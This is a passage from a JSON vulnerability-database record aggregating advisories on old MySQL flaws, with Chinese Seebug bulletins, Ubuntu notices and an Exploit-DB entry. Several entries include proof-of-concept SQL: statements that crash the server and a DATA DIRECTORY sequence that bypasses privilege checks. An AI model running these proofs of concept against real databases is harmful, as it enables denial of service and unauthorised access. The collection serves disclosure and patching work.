1d098c34ad32fab1de5908685c9a6077\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.1 \\\r\n_powerpc.deb Size/MD5: 4361220 1f281f697381cfb468d11a369ebb16a4\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu \\\r\n5.1_powerpc.deb Size/MD5: 8685418 5a004af8a70a5575500db54da4c2b6fa\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu \\\r\n5.1_powerpc.deb Size/MD5: 7206674 05bcbe3dc75172bb7c03db4194210553\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1u \\\r\nbuntu5.1_powerpc.deb Size/MD5: 4061750 962d092c5c6774f0f043557101b07907\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubun \\\r\ntu5.1_sparc.deb Size/MD5: 2318038 4a05ff8676fb62d2877b880c60aceb04\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu \\\r\n5.1_sparc.deb Size/MD5: 1925036 8c70c11fe4610506214a83259301755d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.1 \\\r\n_sparc.deb Size/MD5: 5290706 eecd02ca6929a0119de8f28725a2d061\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.1 \\\r\n_sparc.deb Size/MD5: 4078654 a569a9994e214b5dfa65b98324da2b53\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu \\\r\n5.1_sparc.deb Size/MD5: 8328340 567bfd7dfd65df115d5cf617ea966633\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu \\\r\n5.1_sparc.deb Size/MD5: 7298590 8fed24d4d76cc540cd391d11ff23773e\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1u \\\r\nbuntu5.1_sparc.deb Size/MD5: 3876780 78bb59a165a1a1f8ee2c25f19436f7dc\r\n\r\n\n ", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19118", "status": "poc"}, {"lastseen": "2017-11-19T18:27:52", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "CVE ID: CVE-2008-7247\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\n\u5f53\u6570\u636e\u4e3b\u76ee\u5f55\u5305\u542b\u6709\u5230\u4e0d\u540c\u6587\u4ef6\u7cfb\u7edf\u7684\u7b26\u53f7\u94fe\u63a5\u65f6\uff0cMySQL\u7684ql/sql_table.cc\u5141\u8bb8\u901a\u8fc7\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u4ee5\u7279\u6b8aDATA DIRECTORY\u6216INDEX DIRECTORY\u53c2\u6570\u8c03\u7528CREATE TABLE\u7ed5\u8fc7\u9884\u671f\u7684\u8bbf\u95ee\u9650\u5236\uff0c\u6267\u884c\u5404\u79cd\u975e\u6388\u6743\u64cd\u4f5c\u3002\n\nMySQL AB MySQL 6.0 \r\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/59711", "reporter": "Root", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL CREATE TABLE\u8c03\u7528\u7ed5\u8fc7\u8bbf\u95ee\u9650\u5236\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-7247"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15004", "id": "SSV:15004", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:27:52", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "CVE ID: CVE-2009-4019\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\nMySQL\u7684mysqld\u5b88\u62a4\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406\u5728\u6267\u884c\u67d0\u4e9b\u5e26\u6709\u5b50\u67e5\u8be2\u7684SELECT\u8bed\u53e5\u671f\u95f4\u6240\u4ea7\u751f\u7684\u9519\u8bef\uff0c\u5728\u6267\u884c\u4f7f\u7528GeomFromWKB\u51fd\u6570\u7684\u8bed\u53e5\u671f\u95f4\u6ca1\u6709\u4fdd\u7559\u67d0\u4e9bnull_value\u6807\u8bb0\uff0c\u8fd9\u5141\u8bb8\u901a\u8fc7\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u63d0\u4ea4\u7279\u5236\u8bed\u53e5\u5bfc\u81f4\u5b88\u62a4\u7a0b\u5e8f\u5d29\u6e83\u3002\n\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/88409\r\nhttp://lists.mysql.com/commits/87482", "reporter": "Root", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL SELECT\u8bed\u53e5\u5904\u7406\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15005", "id": "SSV:15005", "sourceData": "\n drop table if exists `t1`;\r\ncreate table `t1`(`a` float);\r\ninsert into `t1` values (-2),(-1);\r\nselect 1 from `t1`\r\nwhere\r\n`a` <> '1' and not\r\nrow(`a`,`a`) <=>\r\nrow((select 1 from `t1` where 1=2),(select 1 from `t1`)) \r\ninto @`var0`;\r\n\r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`c0` bigint,`c3` multipolygon);\r\ninsert into `t1` values \r\n(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));\r\nselect 1 from `t1` where \r\n`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15005", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "status": "poc,details"}, {"lastseen": "2017-11-19T18:25:02", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 37297\r\nCVE ID: CVE-2009-4019\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\nMySQL\u7684\u5728\u5904\u7406\u7279\u5b9a\u7684SQL\u64cd\u4f5c\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u672c\u5730\u6216\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5bfc\u81f4\u670d\u52a1\u5668\u5d29\u6e83\u3002\n\nMySQL AB MySQL 6.0.x\r\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mysql.com/", "reporter": "Root", "published": "2009-12-17T00:00:00", "type": "seebug", "title": "MySQL\u591a\u4e2a\u7578\u5f62SQL\u64cd\u4f5c\u5904\u7406\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15090", "id": "SSV:15090", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:28:25", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 37076\r\nCVE ID: CVE-2009-4028\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\n\u5728\u4f7f\u7528OpenSSL\u7684\u65f6\u5019\uff0cMySQL\u7684viosslfactories.c\u6587\u4ef6\u4e2d\u7684vio_verify_callback\u51fd\u6570\u53ef\u4ee5\u63a5\u53d7\u6df1\u5ea6\u4e3a0\u7684X.509\u8bc1\u4e66\uff1a\r\n\r\nvio_verify_callback() at viosslfactories.c:\r\n\r\n /*\r\n Approve cert if depth is greater then "verify_depth", currently\r\n verify_depth is always 0 and there is no way to increase it.\r\n */\r\n if (verify_depth >= depth)\r\n ok= 1;\r\n\r\n\u63d0\u4f9b\u4e86\u7279\u5236\u8bc1\u4e66\u7684\u57fa\u4e8eSSL MySQL\u6570\u636e\u5e93\u53ef\u4ee5\u6267\u884c\u4e2d\u95f4\u4eba\u653b\u51fb\u3002\n\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/87446", "reporter": "Root", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL OpenSSL\u5ba2\u6237\u7aef\u7ed5\u8fc7yaSSL\u670d\u52a1\u5668\u8bc1\u4e66\u9a8c\u8bc1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4028"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15006", "id": "SSV:15006", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:27:53", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 37075\r\nCVE ID: CVE-2009-4030\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\nMySQL\u5141\u8bb8\u672c\u5730\u7528\u6237\u901a\u8fc7\u5bf9MyISAM\u8868\u8c03\u7528CREATE TABLE\u7ed5\u8fc7\u67d0\u4e9b\u6743\u9650\u68c0\u67e5\u3002\u5728\u901a\u8fc7\u4ee5\u4e0b\u65b9\u5f0f\u521b\u5efaMyISAM\u8868\u65f6\uff1a\r\n\r\n CREATE TABLE ( ) DATA DIRECTORY ... INDEX DIRECTORY ...\r\n\r\n\u7531\u4e8e\u6ca1\u6709\u7279\u522b\u7684\u68c0\u67e5\u786e\u4fdd\u5df2\u6709\u7684\u8868\u683c\u4e0d\u4f1a\u88ab\u7b26\u53f7\u94fe\u63a5\u8986\u76d6\uff0c\u7528\u6237\u53ef\u4ee5\u5728test\u6570\u636e\u5e93\u4e2d\u521b\u5efauser\u8868\u683c\uff0cDATA DIRECTORY\u6307\u5411mysql\u6570\u636e\u5e93\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u4e0emysql_unpacked_real_data_home\u503c\u7684\u9519\u8bef\u8ba1\u7b97\u65b9\u5f0f\u6709\u5173\u3002\n\nMySQL AB MySQL 5.1.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/38278", "reporter": "Root", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL MyISAM\u8868\u7b26\u53f7\u94fe\u63a5\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4030"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15007", "id": "SSV:15007", "sourceData": "\n root> grant all privileges on test.* to test@localhost;\r\n\r\ntest> create table t1 (a int) data directory '/MySQL/var/mysql', index directory\r\n'/MySQL/var/mysql';\r\n\r\nroot> flush tables;\r\nroot> create table t1 (a int);\r\nroot> insert t1 values (1),(2),(3);\r\nroot> flush tables;\r\n\r\ntest> select * from t1;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15007", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "poc,details"}], "ubuntu": [{"lastseen": "2018-08-31T00:09:49", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4098", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4456", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2446", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-7247", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4484", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4030", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4019"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "5.1.37-1ubuntu5.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "5.0.51a-3ubuntu5.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "5.1.30really5.0.75-0ubuntu10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "5.0.22-0ubuntu6.06.12", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "5.0.67-0ubuntu6.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}], "description": "It was discovered that MySQL could be made to overwrite existing table files in the data directory. An authenticated user could use the DATA DIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks. This update alters table creation behaviour by disallowing the use of the MySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This issue only affected Ubuntu 8.10. (CVE-2008-4098)\n\nIt was discovered that MySQL contained a cross-site scripting vulnerability in the command-line client when the \u2013html option is enabled. An attacker could place arbitrary web script or html in a database cell, which would then get placed in the html document output by the command-line tool. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04. (CVE-2008-4456)\n\nIt was discovered that MySQL could be made to overwrite existing table files in the data directory. An authenticated user could use symlinks combined with the DATA DIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks. This issue only affected Ubuntu 9.10. (CVE-2008-7247)\n\nIt was discovered that MySQL contained multiple format string flaws when logging database creation and deletion. An authenticated user could use specially crafted database names to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04. (CVE-2009-2446)\n\nIt was discovered that MySQL incorrectly handled errors when performing certain SELECT statements, and did not preserve correct flags when performing statements that use the GeomFromWKB function. An authenticated user could exploit this to make MySQL crash, causing a denial of service. (CVE-2009-4019)\n\nIt was discovered that MySQL incorrectly checked symlinks when using the DATA DIRECTORY and INDEX DIRECTORY options. A local user could use symlinks to create tables that pointed to tables known to be created at a later time, bypassing access restrictions. (CVE-2009-4030)\n\nIt was discovered that MySQL contained a buffer overflow when parsing ssl certificates. A remote attacker could send crafted requests and cause a denial of service or possibly execute arbitrary code. This issue did not affect Ubuntu 6.06 LTS and the default compiler options for affected releases should reduce the vulnerability to a denial of service. In the default installation, attackers would also be isolated by the AppArmor MySQL profile. (CVE-2009-4484)", "edition": 3, "reporter": "Ubuntu", "published": "2010-02-10T00:00:00", "title": "MySQL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2446", "CVE-2008-4456", "CVE-2009-4030", "CVE-2008-4098", "CVE-2008-7247", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2010-02-10T00:00:00", "id": "USN-897-1", "href": "https://usn.ubuntu.com/897-1/", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:26", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4098", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0494", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4456", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0490", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0489", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3680", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0484", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3838", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0488", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3837", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0101", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0102", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0116", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0493", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0115", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0496", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3682", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0491", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3840", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3963", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1849", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3677", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2446", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0113", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3839", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-7247", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1850", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3683", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0114", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3681", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1621", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4484", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0120", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2262", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3834", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3833", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0486", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0487", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3836", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-5925", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0087", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0492", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1848", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4030", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3678", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0112", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0118", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0485", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1626", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0495", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3679", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-2008", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0119", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4019", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0117", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0075", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3835"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "5.0.95-0ubuntu1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "5.1.61-0ubuntu0.11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "5.1.61-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "5.1.61-0ubuntu0.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "5.1.61-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}], "description": "Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.1.61 in Ubuntu 10.04 LTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10. Ubuntu 8.04 LTS has been updated to MySQL 5.0.95.\n\nIn addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.\n\nPlease see the following for more information:\n\n<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html> <http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html> <http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html>", "edition": 3, "reporter": "Ubuntu", "published": "2012-03-12T00:00:00", "title": "MySQL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-0075", "CVE-2012-0489", "CVE-2009-2446", "CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2008-4456", "CVE-2010-3839", "CVE-2009-4030", "CVE-2010-3835", "CVE-2012-0112", "CVE-2010-3681", "CVE-2010-3833", "CVE-2012-0491", "CVE-2012-0496", "CVE-2012-0113", "CVE-2007-5925", "CVE-2010-3840", "CVE-2012-0484", "CVE-2012-0494", "CVE-2012-0115", "CVE-2010-1621", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-1626", "CVE-2008-4098", "CVE-2010-2008", "CVE-2012-0101", "CVE-2010-3836", "CVE-2012-0488", "CVE-2010-3683", "CVE-2010-3677", "CVE-2008-3963", "CVE-2012-0493", "CVE-2010-1850", "CVE-2012-0114", "CVE-2010-3834", "CVE-2012-0495", "CVE-2010-3838", "CVE-2012-0119", "CVE-2012-0492", "CVE-2012-0116", "CVE-2012-0485", "CVE-2010-1848", "CVE-2008-7247", "CVE-2012-0117", "CVE-2012-0487", "CVE-2012-0087", "CVE-2012-0490", "CVE-2010-1849", "CVE-2012-0120", "CVE-2009-4019", "CVE-2011-2262", "CVE-2012-0118", "CVE-2009-4484", "CVE-2012-0102", "CVE-2012-0486"], "modified": "2012-03-12T00:00:00", "id": "USN-1397-1", "href": "https://usn.ubuntu.com/1397-1/", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T19:06:41", "osvdbidlist": ["60489"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MySQL 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS. CVE-2009-4019. Dos exploit for linux platform", "reporter": "Shane Bester", "published": "2009-11-23T00:00:00", "type": "exploitdb", "title": "MySQL <= 6.0.9 GeomFromWKB Function First Argument Geometry Value Handling DoS", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-11-23T00:00:00", "id": "EDB-ID:33398", "href": "https://www.exploit-db.com/exploits/33398/", "sourceData": "source: http://www.securityfocus.com/bid/37297/info\r\n \r\nMySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.\r\n \r\nAn attacker can exploit these issues to crash the application, denying access to legitimate users.\r\n \r\nVersions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. \r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`c0` bigint,`c3` multipolygon);\r\ninsert into `t1` values \r\n(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));\r\nselect 1 from `t1` where \r\n`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": 